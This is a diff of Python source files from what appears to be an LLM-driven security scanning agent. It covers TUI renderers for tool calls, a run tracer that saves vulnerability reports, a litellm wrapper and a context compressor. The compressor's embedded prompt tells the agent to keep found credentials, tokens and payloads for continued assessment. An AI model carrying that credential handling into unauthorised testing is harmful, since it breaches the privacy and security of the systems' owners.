from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class CreateVulnerabilityReportRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "create_vulnerability_report"
css_classes: ClassVar[list[str]] = ["tool-call", "reporting-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
title = args.get("title", "")
severity = args.get("severity", "")
content = args.get("content", "")
header = "🐞 [bold #ea580c]Vulnerability Report[/]"
if title:
content_parts = [f"{header}\n [bold]{cls.escape_markup(title)}[/]"]
if severity:
severity_color = cls._get_severity_color(severity.lower())
content_parts.append(
f" [dim]Severity: [{severity_color}]{severity.upper()}[/{severity_color}][/]"
)
if content:
content_preview = content[:100] + "..." if len(content) > 100 else content
content_parts.append(f" [dim]{cls.escape_markup(content_preview)}[/]")
content_text = "\n".join(content_parts)
else:
content_text = f"{header}\n [dim]Creating report...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@classmethod
def _get_severity_color(cls, severity: str) -> str:
severity_colors = {
"critical": "#dc2626",
"high": "#ea580c",
"medium": "#d97706",
"low": "#65a30d",
"info": "#0284c7",
}
return severity_colors.get(severity, "#6b7280")

View File

@@ -0,0 +1,58 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class ScanStartInfoRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "scan_start_info"
css_classes: ClassVar[list[str]] = ["tool-call", "scan-info-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
status = tool_data.get("status", "unknown")
target = args.get("target", {})
target_display = cls._build_target_display(target)
content = f"🚀 Starting scan on {target_display}"
css_classes = cls.get_css_classes(status)
return Static(content, classes=css_classes)
@classmethod
def _build_target_display(cls, target: dict[str, Any]) -> str:
if target_url := target.get("target_url"):
return f"[bold #22c55e]{target_url}[/bold #22c55e]"
if target_repo := target.get("target_repo"):
return f"[bold #22c55e]{target_repo}[/bold #22c55e]"
if target_path := target.get("target_path"):
return f"[bold #22c55e]{target_path}[/bold #22c55e]"
return "[dim]unknown target[/dim]"
@register_tool_renderer
class SubagentStartInfoRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "subagent_start_info"
css_classes: ClassVar[list[str]] = ["tool-call", "subagent-info-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
status = tool_data.get("status", "unknown")
name = args.get("name", "Unknown Agent")
task = args.get("task", "")
content = f"🤖 Spawned subagent [bold #22c55e]{name}[/bold #22c55e]"
if task:
display_task = task[:80] + "..." if len(task) > 80 else task
content += f"\n Task: [dim]{display_task}[/dim]"
css_classes = cls.get_css_classes(status)
return Static(content, classes=css_classes)

View File

@@ -0,0 +1,99 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class TerminalRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "terminal_action"
css_classes: ClassVar[list[str]] = ["tool-call", "terminal-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
status = tool_data.get("status", "unknown")
result = tool_data.get("result", {})
action = args.get("action", "unknown")
inputs = args.get("inputs", [])
terminal_id = args.get("terminal_id", "default")
content = cls._build_sleek_content(action, inputs, terminal_id, result)
css_classes = cls.get_css_classes(status)
return Static(content, classes=css_classes)
@classmethod
def _build_sleek_content(
cls,
action: str,
inputs: list[str],
terminal_id: str, # noqa: ARG003
result: dict[str, Any], # noqa: ARG003
) -> str:
terminal_icon = ">_"
if action in {"create", "new_terminal"}:
command = cls._format_command(inputs) if inputs else "bash"
return f"{terminal_icon} [#22c55e]${command}[/]"
if action == "send_input":
command = cls._format_command(inputs)
return f"{terminal_icon} [#22c55e]${command}[/]"
if action == "wait":
return f"{terminal_icon} [dim]waiting...[/]"
if action == "close":
return f"{terminal_icon} [dim]close[/]"
if action == "get_snapshot":
return f"{terminal_icon} [dim]snapshot[/]"
return f"{terminal_icon} [dim]{action}[/]"
@classmethod
def _format_command(cls, inputs: list[str]) -> str:
if not inputs:
return ""
command_parts = []
for input_item in inputs:
if input_item == "Enter":
break
if input_item.startswith("literal:"):
command_parts.append(input_item[8:])
elif input_item in [
"Space",
"Tab",
"Backspace",
"Up",
"Down",
"Left",
"Right",
"Home",
"End",
"PageUp",
"PageDown",
"Insert",
"Delete",
"Escape",
] or input_item.startswith(("^", "C-", "S-", "A-", "F")):
if input_item == "Space":
command_parts.append(" ")
elif input_item == "Tab":
command_parts.append("\t")
continue
else:
command_parts.append(input_item)
command = "".join(command_parts).strip()
if len(command) > 200:
command = command[:197] + "..."
return cls.escape_markup(command) if command else "bash"

View File

@@ -0,0 +1,29 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class ThinkRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "think"
css_classes: ClassVar[list[str]] = ["tool-call", "thinking-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
thought = args.get("thought", "")
header = "🧠 [bold #a855f7]Thinking[/]"
if thought:
thought_display = thought[:200] + "..." if len(thought) > 200 else thought
content = f"{header}\n [italic dim]{cls.escape_markup(thought_display)}[/]"
else:
content = f"{header}\n [italic dim]Thinking...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content, classes=css_classes)

View File

@@ -0,0 +1,43 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class UserMessageRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "user_message"
css_classes: ClassVar[list[str]] = ["chat-message", "user-message"]
@classmethod
def render(cls, message_data: dict[str, Any]) -> Static:
content = message_data.get("content", "")
if not content:
return Static("", classes=cls.css_classes)
if len(content) > 300:
content = content[:297] + "..."
lines = content.split("\n")
bordered_lines = [f"[#3b82f6]▍[/#3b82f6] {line}" for line in lines]
bordered_content = "\n".join(bordered_lines)
formatted_content = f"[#3b82f6]▍[/#3b82f6] [bold]You:[/]\n{bordered_content}"
css_classes = " ".join(cls.css_classes)
return Static(formatted_content, classes=css_classes)
@classmethod
def render_simple(cls, content: str) -> str:
if not content:
return ""
if len(content) > 300:
content = content[:297] + "..."
lines = content.split("\n")
bordered_lines = [f"[#3b82f6]▍[/#3b82f6] {line}" for line in lines]
bordered_content = "\n".join(bordered_lines)
return f"[#3b82f6]▍[/#3b82f6] [bold]You:[/]\n{bordered_content}"

View File

@@ -0,0 +1,28 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class WebSearchRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "web_search"
css_classes: ClassVar[list[str]] = ["tool-call", "web-search-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
query = args.get("query", "")
header = "🌐 [bold #60a5fa]Searching the web...[/]"
if query:
query_display = query[:100] + "..." if len(query) > 100 else query
content_text = f"{header}\n [dim]{cls.escape_markup(query_display)}[/]"
else:
content_text = f"{header}"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)

308
strix/cli/tracer.py Normal file
View File

@@ -0,0 +1,308 @@
import logging
from datetime import UTC, datetime
from pathlib import Path
from typing import Any, Optional
from uuid import uuid4
logger = logging.getLogger(__name__)
_global_tracer: Optional["Tracer"] = None
def get_global_tracer() -> Optional["Tracer"]:
return _global_tracer
def set_global_tracer(tracer: "Tracer") -> None:
global _global_tracer # noqa: PLW0603
_global_tracer = tracer
class Tracer:
def __init__(self, run_name: str | None = None):
self.run_name = run_name
self.run_id = run_name or f"run-{uuid4().hex[:8]}"
self.start_time = datetime.now(UTC).isoformat()
self.end_time: str | None = None
self.agents: dict[str, dict[str, Any]] = {}
self.tool_executions: dict[int, dict[str, Any]] = {}
self.chat_messages: list[dict[str, Any]] = []
self.vulnerability_reports: list[dict[str, Any]] = []
self.final_scan_result: str | None = None
self.scan_results: dict[str, Any] | None = None
self.scan_config: dict[str, Any] | None = None
self.run_metadata: dict[str, Any] = {
"run_id": self.run_id,
"run_name": self.run_name,
"start_time": self.start_time,
"end_time": None,
"target": None,
"scan_type": None,
"status": "running",
}
self._run_dir: Path | None = None
self._next_execution_id = 1
self._next_message_id = 1
def set_run_name(self, run_name: str) -> None:
self.run_name = run_name
self.run_id = run_name
def get_run_dir(self) -> Path:
if self._run_dir is None:
workspace_root = Path(__file__).parent.parent.parent
runs_dir = workspace_root / "agent_runs"
runs_dir.mkdir(exist_ok=True)
run_dir_name = self.run_name if self.run_name else self.run_id
self._run_dir = runs_dir / run_dir_name
self._run_dir.mkdir(exist_ok=True)
return self._run_dir
def add_vulnerability_report(
self,
title: str,
content: str,
severity: str,
) -> str:
report_id = f"vuln-{len(self.vulnerability_reports) + 1:04d}"
report = {
"id": report_id,
"title": title.strip(),
"content": content.strip(),
"severity": severity.lower().strip(),
"timestamp": datetime.now(UTC).strftime("%Y-%m-%d %H:%M:%S UTC"),
}
self.vulnerability_reports.append(report)
logger.info(f"Added vulnerability report: {report_id} - {title}")
return report_id
def set_final_scan_result(
self,
content: str,
success: bool = True,
) -> None:
self.final_scan_result = content.strip()
self.scan_results = {
"scan_completed": True,
"content": content,
"success": success,
}
logger.info(f"Set final scan result: success={success}")
def log_agent_creation(
self, agent_id: str, name: str, task: str, parent_id: str | None = None
) -> None:
agent_data: dict[str, Any] = {
"id": agent_id,
"name": name,
"task": task,
"status": "running",
"parent_id": parent_id,
"created_at": datetime.now(UTC).isoformat(),
"updated_at": datetime.now(UTC).isoformat(),
"tool_executions": [],
}
self.agents[agent_id] = agent_data
def log_chat_message(
self,
content: str,
role: str,
agent_id: str | None = None,
metadata: dict[str, Any] | None = None,
) -> int:
message_id = self._next_message_id
self._next_message_id += 1
message_data = {
"message_id": message_id,
"content": content,
"role": role,
"agent_id": agent_id,
"timestamp": datetime.now(UTC).isoformat(),
"metadata": metadata or {},
}
self.chat_messages.append(message_data)
return message_id
def log_tool_execution_start(self, agent_id: str, tool_name: str, args: dict[str, Any]) -> int:
execution_id = self._next_execution_id
self._next_execution_id += 1
now = datetime.now(UTC).isoformat()
execution_data = {
"execution_id": execution_id,
"agent_id": agent_id,
"tool_name": tool_name,
"args": args,
"status": "running",
"result": None,
"timestamp": now,
"started_at": now,
"completed_at": None,
}
self.tool_executions[execution_id] = execution_data
if agent_id in self.agents:
self.agents[agent_id]["tool_executions"].append(execution_id)
return execution_id
def update_tool_execution(
self, execution_id: int, status: str, result: Any | None = None
) -> None:
if execution_id in self.tool_executions:
self.tool_executions[execution_id]["status"] = status
self.tool_executions[execution_id]["result"] = result
self.tool_executions[execution_id]["completed_at"] = datetime.now(UTC).isoformat()
def update_agent_status(self, agent_id: str, status: str) -> None:
if agent_id in self.agents:
self.agents[agent_id]["status"] = status
self.agents[agent_id]["updated_at"] = datetime.now(UTC).isoformat()
def set_scan_config(self, config: dict[str, Any]) -> None:
self.scan_config = config
self.run_metadata.update(
{
"target": config.get("target", {}),
"scan_type": config.get("scan_type", "general"),
"user_instructions": config.get("user_instructions", ""),
"max_iterations": config.get("max_iterations", 200),
}
)
def save_run_data(self) -> None:
try:
run_dir = self.get_run_dir()
self.end_time = datetime.now(UTC).isoformat()
if self.final_scan_result:
scan_report_file = run_dir / "scan_report.md"
with scan_report_file.open("w", encoding="utf-8") as f:
f.write("# Security Scan Report\n\n")
f.write(
f"**Generated:** {datetime.now(UTC).strftime('%Y-%m-%d %H:%M:%S UTC')}\n\n"
)
f.write(f"{self.final_scan_result}\n")
logger.info(f"Saved final scan report to: {scan_report_file}")
if self.vulnerability_reports:
vuln_dir = run_dir / "vulnerabilities"
vuln_dir.mkdir(exist_ok=True)
severity_order = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4}
sorted_reports = sorted(
self.vulnerability_reports,
key=lambda x: (severity_order.get(x["severity"], 5), x["timestamp"]),
)
for report in sorted_reports:
vuln_file = vuln_dir / f"{report['id']}.md"
with vuln_file.open("w", encoding="utf-8") as f:
f.write(f"# {report['title']}\n\n")
f.write(f"**ID:** {report['id']}\n")
f.write(f"**Severity:** {report['severity'].upper()}\n")
f.write(f"**Found:** {report['timestamp']}\n\n")
f.write("## Description\n\n")
f.write(f"{report['content']}\n")
vuln_csv_file = run_dir / "vulnerabilities.csv"
with vuln_csv_file.open("w", encoding="utf-8", newline="") as f:
import csv
fieldnames = ["id", "title", "severity", "timestamp", "file"]
writer = csv.DictWriter(f, fieldnames=fieldnames)
writer.writeheader()
for report in sorted_reports:
writer.writerow(
{
"id": report["id"],
"title": report["title"],
"severity": report["severity"].upper(),
"timestamp": report["timestamp"],
"file": f"vulnerabilities/{report['id']}.md",
}
)
logger.info(
f"Saved {len(self.vulnerability_reports)} vulnerability reports to: {vuln_dir}"
)
logger.info(f"Saved vulnerability index to: {vuln_csv_file}")
logger.info(f"📊 Essential scan data saved to: {run_dir}")
except (OSError, RuntimeError):
logger.exception("Failed to save scan data")
def _calculate_duration(self) -> float:
try:
start = datetime.fromisoformat(self.start_time.replace("Z", "+00:00"))
if self.end_time:
end = datetime.fromisoformat(self.end_time.replace("Z", "+00:00"))
return (end - start).total_seconds()
except (ValueError, TypeError):
pass
return 0.0
def get_agent_tools(self, agent_id: str) -> list[dict[str, Any]]:
return [
exec_data
for exec_data in self.tool_executions.values()
if exec_data.get("agent_id") == agent_id
]
def get_real_tool_count(self) -> int:
return sum(
1
for exec_data in self.tool_executions.values()
if exec_data.get("tool_name") not in ["scan_start_info", "subagent_start_info"]
)
def get_total_llm_stats(self) -> dict[str, Any]:
from strix.tools.agents_graph.agents_graph_actions import _agent_instances
total_stats = {
"input_tokens": 0,
"output_tokens": 0,
"cached_tokens": 0,
"cache_creation_tokens": 0,
"cost": 0.0,
"requests": 0,
"failed_requests": 0,
}
for agent_instance in _agent_instances.values():
if hasattr(agent_instance, "llm") and hasattr(agent_instance.llm, "_total_stats"):
agent_stats = agent_instance.llm._total_stats
total_stats["input_tokens"] += agent_stats.input_tokens
total_stats["output_tokens"] += agent_stats.output_tokens
total_stats["cached_tokens"] += agent_stats.cached_tokens
total_stats["cache_creation_tokens"] += agent_stats.cache_creation_tokens
total_stats["cost"] += agent_stats.cost
total_stats["requests"] += agent_stats.requests
total_stats["failed_requests"] += agent_stats.failed_requests
total_stats["cost"] = round(total_stats["cost"], 4)
return {
"total": total_stats,
"total_tokens": total_stats["input_tokens"] + total_stats["output_tokens"],
}
def cleanup(self) -> None:
self.save_run_data()

12
strix/llm/__init__.py Normal file
View File

@@ -0,0 +1,12 @@
import litellm
from .config import LLMConfig
from .llm import LLM
__all__ = [
"LLM",
"LLMConfig",
]
litellm.drop_params = True

19
strix/llm/config.py Normal file
View File

@@ -0,0 +1,19 @@
import os
class LLMConfig:
def __init__(
self,
model_name: str | None = None,
temperature: float = 0,
enable_prompt_caching: bool = True,
prompt_modules: list[str] | None = None,
):
self.model_name = model_name or os.getenv("STRIX_LLM", "anthropic/claude-sonnet-4-20250514")
if not self.model_name:
raise ValueError("STRIX_LLM environment variable must be set and not empty")
self.temperature = max(0.0, min(1.0, temperature))
self.enable_prompt_caching = enable_prompt_caching
self.prompt_modules = prompt_modules or []

310
strix/llm/llm.py Normal file
View File

@@ -0,0 +1,310 @@
import logging
import os
from dataclasses import dataclass
from enum import Enum
from pathlib import Path
from typing import Any
import litellm
from jinja2 import (
Environment,
FileSystemLoader,
select_autoescape,
)
from litellm import ModelResponse, completion_cost
from litellm.utils import supports_prompt_caching
from strix.llm.config import LLMConfig
from strix.llm.memory_compressor import MemoryCompressor
from strix.llm.request_queue import get_global_queue
from strix.llm.utils import _truncate_to_first_function, parse_tool_invocations
from strix.prompts import load_prompt_modules
from strix.tools import get_tools_prompt
logger = logging.getLogger(__name__)
api_key = os.getenv("LLM_API_KEY")
if api_key:
litellm.api_key = api_key
class StepRole(str, Enum):
AGENT = "agent"
USER = "user"
SYSTEM = "system"
@dataclass
class LLMResponse:
content: str
tool_invocations: list[dict[str, Any]] | None = None
scan_id: str | None = None
step_number: int = 1
role: StepRole = StepRole.AGENT
@dataclass
class RequestStats:
input_tokens: int = 0
output_tokens: int = 0
cached_tokens: int = 0
cache_creation_tokens: int = 0
cost: float = 0.0
requests: int = 0
failed_requests: int = 0
def to_dict(self) -> dict[str, int | float]:
return {
"input_tokens": self.input_tokens,
"output_tokens": self.output_tokens,
"cached_tokens": self.cached_tokens,
"cache_creation_tokens": self.cache_creation_tokens,
"cost": round(self.cost, 4),
"requests": self.requests,
"failed_requests": self.failed_requests,
}
class LLM:
def __init__(self, config: LLMConfig, agent_name: str | None = None):
self.config = config
self.agent_name = agent_name
self._total_stats = RequestStats()
self._last_request_stats = RequestStats()
self.memory_compressor = MemoryCompressor()
if agent_name:
prompt_dir = Path(__file__).parent.parent / "agents" / agent_name
prompts_dir = Path(__file__).parent.parent / "prompts"
loader = FileSystemLoader([prompt_dir, prompts_dir])
self.jinja_env = Environment(
loader=loader,
autoescape=select_autoescape(enabled_extensions=(), default_for_string=False),
)
try:
prompt_module_content = load_prompt_modules(
self.config.prompt_modules or [], self.jinja_env
)
def get_module(name: str) -> str:
return prompt_module_content.get(name, "")
self.jinja_env.globals["get_module"] = get_module
self.system_prompt = self.jinja_env.get_template("system_prompt.jinja").render(
get_tools_prompt=get_tools_prompt,
loaded_module_names=list(prompt_module_content.keys()),
**prompt_module_content,
)
except (FileNotFoundError, OSError, ValueError) as e:
logger.warning(f"Failed to load system prompt for {agent_name}: {e}")
self.system_prompt = "You are a helpful AI assistant."
else:
self.system_prompt = "You are a helpful AI assistant."
def _add_cache_control_to_content(
self, content: str | list[dict[str, Any]]
) -> str | list[dict[str, Any]]:
if isinstance(content, str):
return [{"type": "text", "text": content, "cache_control": {"type": "ephemeral"}}]
if isinstance(content, list) and content:
last_item = content[-1]
if isinstance(last_item, dict) and last_item.get("type") == "text":
return content[:-1] + [{**last_item, "cache_control": {"type": "ephemeral"}}]
return content
def _is_anthropic_model(self) -> bool:
if not self.config.model_name:
return False
model_lower = self.config.model_name.lower()
return any(provider in model_lower for provider in ["anthropic/", "claude"])
def _calculate_cache_interval(self, total_messages: int) -> int:
if total_messages <= 1:
return 10
max_cached_messages = 3
non_system_messages = total_messages - 1
interval = 10
while non_system_messages // interval > max_cached_messages:
interval += 10
return interval
def _prepare_cached_messages(self, messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
if (
not self.config.enable_prompt_caching
or not supports_prompt_caching(self.config.model_name)
or not messages
):
return messages
if not self._is_anthropic_model():
return messages
cached_messages = list(messages)
if cached_messages and cached_messages[0].get("role") == "system":
system_message = cached_messages[0].copy()
system_message["content"] = self._add_cache_control_to_content(
system_message["content"]
)
cached_messages[0] = system_message
total_messages = len(cached_messages)
if total_messages > 1:
interval = self._calculate_cache_interval(total_messages)
cached_count = 0
for i in range(interval, total_messages, interval):
if cached_count >= 3:
break
if i < len(cached_messages):
message = cached_messages[i].copy()
message["content"] = self._add_cache_control_to_content(message["content"])
cached_messages[i] = message
cached_count += 1
return cached_messages
async def generate(
self,
conversation_history: list[dict[str, Any]],
scan_id: str | None = None,
step_number: int = 1,
) -> LLMResponse:
messages = [{"role": "system", "content": self.system_prompt}]
compressed_history = list(self.memory_compressor.compress_history(conversation_history))
conversation_history.clear()
conversation_history.extend(compressed_history)
messages.extend(compressed_history)
cached_messages = self._prepare_cached_messages(messages)
try:
response = await self._make_request(cached_messages)
self._update_usage_stats(response)
content = ""
if (
response.choices
and hasattr(response.choices[0], "message")
and response.choices[0].message
):
content = getattr(response.choices[0].message, "content", "") or ""
content = _truncate_to_first_function(content)
if "</function>" in content:
function_end_index = content.find("</function>") + len("</function>")
content = content[:function_end_index]
tool_invocations = parse_tool_invocations(content)
return LLMResponse(
scan_id=scan_id,
step_number=step_number,
role=StepRole.AGENT,
content=content,
tool_invocations=tool_invocations if tool_invocations else None,
)
except (ValueError, TypeError, RuntimeError):
logger.exception("Error in LLM generation")
return LLMResponse(
scan_id=scan_id,
step_number=step_number,
role=StepRole.AGENT,
content="An error occurred while generating the response",
tool_invocations=None,
)
@property
def usage_stats(self) -> dict[str, dict[str, int | float]]:
return {
"total": self._total_stats.to_dict(),
"last_request": self._last_request_stats.to_dict(),
}
def get_cache_config(self) -> dict[str, bool]:
return {
"enabled": self.config.enable_prompt_caching,
"supported": supports_prompt_caching(self.config.model_name),
}
async def _make_request(
self,
messages: list[dict[str, Any]],
) -> ModelResponse:
completion_args = {
"model": self.config.model_name,
"messages": messages,
"temperature": self.config.temperature,
"stop": ["</function>"],
}
queue = get_global_queue()
response = await queue.make_request(completion_args)
self._total_stats.requests += 1
self._last_request_stats = RequestStats(requests=1)
return response
def _update_usage_stats(self, response: ModelResponse) -> None:
try:
if hasattr(response, "usage") and response.usage:
input_tokens = getattr(response.usage, "prompt_tokens", 0)
output_tokens = getattr(response.usage, "completion_tokens", 0)
cached_tokens = 0
cache_creation_tokens = 0
if hasattr(response.usage, "prompt_tokens_details"):
prompt_details = response.usage.prompt_tokens_details
if hasattr(prompt_details, "cached_tokens"):
cached_tokens = prompt_details.cached_tokens or 0
if hasattr(response.usage, "cache_creation_input_tokens"):
cache_creation_tokens = response.usage.cache_creation_input_tokens or 0
else:
input_tokens = 0
output_tokens = 0
cached_tokens = 0
cache_creation_tokens = 0
try:
cost = completion_cost(response) or 0.0
except (ValueError, TypeError, RuntimeError) as e:
logger.warning(f"Failed to calculate cost: {e}")
cost = 0.0
self._total_stats.input_tokens += input_tokens
self._total_stats.output_tokens += output_tokens
self._total_stats.cached_tokens += cached_tokens
self._total_stats.cache_creation_tokens += cache_creation_tokens
self._total_stats.cost += cost
self._last_request_stats.input_tokens = input_tokens
self._last_request_stats.output_tokens = output_tokens
self._last_request_stats.cached_tokens = cached_tokens
self._last_request_stats.cache_creation_tokens = cache_creation_tokens
self._last_request_stats.cost = cost
if cached_tokens > 0:
logger.info(f"Cache hit: {cached_tokens} cached tokens, {input_tokens} new tokens")
if cache_creation_tokens > 0:
logger.info(f"Cache creation: {cache_creation_tokens} tokens written to cache")
logger.info(f"Usage stats: {self.usage_stats}")
except (AttributeError, TypeError, ValueError) as e:
logger.warning(f"Failed to update usage stats: {e}")

View File

@@ -0,0 +1,206 @@
import logging
import os
from typing import Any
import litellm
logger = logging.getLogger(__name__)
MAX_TOTAL_TOKENS = 100_000
MIN_RECENT_MESSAGES = 15
SUMMARY_PROMPT_TEMPLATE = """You are an agent performing context
condensation for a security agent. Your job is to compress scan data while preserving
ALL operationally critical information for continuing the security assessment.
CRITICAL ELEMENTS TO PRESERVE:
- Discovered vulnerabilities and potential attack vectors
- Scan results and tool outputs (compressed but maintaining key findings)
- Access credentials, tokens, or authentication details found
- System architecture insights and potential weak points
- Progress made in the assessment
- Failed attempts and dead ends (to avoid duplication)
- Any decisions made about the testing approach
COMPRESSION GUIDELINES:
- Preserve exact technical details (URLs, paths, parameters, payloads)
- Summarize verbose tool outputs while keeping critical findings
- Maintain version numbers, specific technologies identified
- Keep exact error messages that might indicate vulnerabilities
- Compress repetitive or similar findings into consolidated form
Remember: Another security agent will use this summary to continue the assessment.
They must be able to pick up exactly where you left off without losing any
operational advantage or context needed to find vulnerabilities.
CONVERSATION SEGMENT TO SUMMARIZE:
{conversation}
Provide a technically precise summary that preserves all operational security context while
keeping the summary concise and to the point."""
def _count_tokens(text: str, model: str) -> int:
try:
count = litellm.token_counter(model=model, text=text)
return int(count)
except Exception:
logger.exception("Failed to count tokens")
return len(text) // 4 # Rough estimate
def _get_message_tokens(msg: dict[str, Any], model: str) -> int:
content = msg.get("content", "")
if isinstance(content, str):
return _count_tokens(content, model)
if isinstance(content, list):
return sum(
_count_tokens(item.get("text", ""), model)
for item in content
if isinstance(item, dict) and item.get("type") == "text"
)
return 0
def _extract_message_text(msg: dict[str, Any]) -> str:
content = msg.get("content", "")
if isinstance(content, str):
return content
if isinstance(content, list):
parts = []
for item in content:
if isinstance(item, dict):
if item.get("type") == "text":
parts.append(item.get("text", ""))
elif item.get("type") == "image_url":
parts.append("[IMAGE]")
return " ".join(parts)
return str(content)
def _summarize_messages(
messages: list[dict[str, Any]],
model: str,
) -> dict[str, Any]:
if not messages:
empty_summary = "<context_summary message_count='0'>{text}</context_summary>"
return {
"role": "assistant",
"content": empty_summary.format(text="No messages to summarize"),
}
formatted = []
for msg in messages:
role = msg.get("role", "unknown")
text = _extract_message_text(msg)
formatted.append(f"{role}: {text}")
conversation = "\n".join(formatted)
prompt = SUMMARY_PROMPT_TEMPLATE.format(conversation=conversation)
try:
completion_args = {
"model": model,
"messages": [{"role": "user", "content": prompt}],
}
response = litellm.completion(**completion_args)
summary = response.choices[0].message.content
summary_msg = "<context_summary message_count='{count}'>{text}</context_summary>"
return {
"role": "assistant",
"content": summary_msg.format(count=len(messages), text=summary),
}
except Exception:
logger.exception("Failed to summarize messages")
return messages[0]
def _handle_images(messages: list[dict[str, Any]], max_images: int) -> None:
image_count = 0
for msg in reversed(messages):
content = msg.get("content", [])
if isinstance(content, list):
for item in content:
if isinstance(item, dict) and item.get("type") == "image_url":
if image_count >= max_images:
item.update(
{
"type": "text",
"text": "[Previously attached image removed to preserve context]",
}
)
else:
image_count += 1
class MemoryCompressor:
def __init__(
self,
max_images: int = 3,
model_name: str | None = None,
):
self.max_images = max_images
self.model_name = model_name or os.getenv("STRIX_LLM", "anthropic/claude-sonnet-4-20250514")
if not self.model_name:
raise ValueError("STRIX_LLM environment variable must be set and not empty")
def compress_history(
self,
messages: list[dict[str, Any]],
) -> list[dict[str, Any]]:
"""Compress conversation history to stay within token limits.
Strategy:
1. Handle image limits first
2. Keep all system messages
3. Keep minimum recent messages
4. Summarize older messages when total tokens exceed limit
The compression preserves:
- All system messages unchanged
- Most recent messages intact
- Critical security context in summaries
- Recent images for visual context
- Technical details and findings
"""
if not messages:
return messages
_handle_images(messages, self.max_images)
system_msgs = []
regular_msgs = []
for msg in messages:
if msg.get("role") == "system":
system_msgs.append(msg)
else:
regular_msgs.append(msg)
recent_msgs = regular_msgs[-MIN_RECENT_MESSAGES:]
old_msgs = regular_msgs[:-MIN_RECENT_MESSAGES]
# Type assertion since we ensure model_name is not None in __init__
model_name: str = self.model_name # type: ignore[assignment]
total_tokens = sum(
_get_message_tokens(msg, model_name) for msg in system_msgs + regular_msgs
)
if total_tokens <= MAX_TOTAL_TOKENS * 0.9:
return messages
compressed = []
chunk_size = 10
for i in range(0, len(old_msgs), chunk_size):
chunk = old_msgs[i : i + chunk_size]
summary = _summarize_messages(chunk, model_name)
if summary:
compressed.append(summary)
return system_msgs + compressed + recent_msgs

View File

@@ -0,0 +1,63 @@
import asyncio
import logging
import threading
import time
from typing import Any
from litellm import ModelResponse, completion
from tenacity import retry, stop_after_attempt, wait_exponential
logger = logging.getLogger(__name__)
class LLMRequestQueue:
def __init__(self, max_concurrent: int = 6, delay_between_requests: float = 1.0):
self.max_concurrent = max_concurrent
self.delay_between_requests = delay_between_requests
self._semaphore = threading.BoundedSemaphore(max_concurrent)
self._last_request_time = 0.0
self._lock = threading.Lock()
async def make_request(self, completion_args: dict[str, Any]) -> ModelResponse:
try:
while not self._semaphore.acquire(timeout=0.2):
await asyncio.sleep(0.1)
with self._lock:
now = time.time()
time_since_last = now - self._last_request_time
sleep_needed = max(0, self.delay_between_requests - time_since_last)
self._last_request_time = now + sleep_needed
if sleep_needed > 0:
await asyncio.sleep(sleep_needed)
return await self._reliable_request(completion_args)
finally:
self._semaphore.release()
@retry( # type: ignore[misc]
stop=stop_after_attempt(15),
wait=wait_exponential(multiplier=1.2, min=1, max=300),
reraise=True,
)
async def _reliable_request(self, completion_args: dict[str, Any]) -> ModelResponse:
response = completion(**completion_args, stream=False)
if isinstance(response, ModelResponse):
return response
self._raise_unexpected_response()
raise RuntimeError("Unreachable code")
def _raise_unexpected_response(self) -> None:
raise RuntimeError("Unexpected response type")
_global_queue: LLMRequestQueue | None = None
def get_global_queue() -> LLMRequestQueue:
global _global_queue # noqa: PLW0603
if _global_queue is None:
_global_queue = LLMRequestQueue()
return _global_queue

84
strix/llm/utils.py Normal file
View File

@@ -0,0 +1,84 @@
import re
from typing import Any
def _truncate_to_first_function(content: str) -> str:
if not content:
return content
function_starts = [match.start() for match in re.finditer(r"<function=", content)]
if len(function_starts) >= 2:
second_function_start = function_starts[1]
return content[:second_function_start].rstrip()
return content
def parse_tool_invocations(content: str) -> list[dict[str, Any]] | None:
content = _fix_stopword(content)
tool_invocations: list[dict[str, Any]] = []
fn_regex_pattern = r"<function=([^>]+)>\n?(.*?)</function>"
fn_param_regex_pattern = r"<parameter=([^>]+)>(.*?)</parameter>"
fn_matches = re.finditer(fn_regex_pattern, content, re.DOTALL)
for fn_match in fn_matches:
fn_name = fn_match.group(1)
fn_body = fn_match.group(2)
param_matches = re.finditer(fn_param_regex_pattern, fn_body, re.DOTALL)
args = {}
for param_match in param_matches:
param_name = param_match.group(1)
param_value = param_match.group(2).strip()
args[param_name] = param_value
tool_invocations.append({"toolName": fn_name, "args": args})
return tool_invocations if tool_invocations else None
def _fix_stopword(content: str) -> str:
if "<function=" in content and content.count("<function=") == 1:
if content.endswith("</"):
content = content.rstrip() + "function>"
elif not content.rstrip().endswith("</function>"):
content = content + "\n</function>"
return content
def format_tool_call(tool_name: str, args: dict[str, Any]) -> str:
xml_parts = [f"<function={tool_name}>"]
for key, value in args.items():
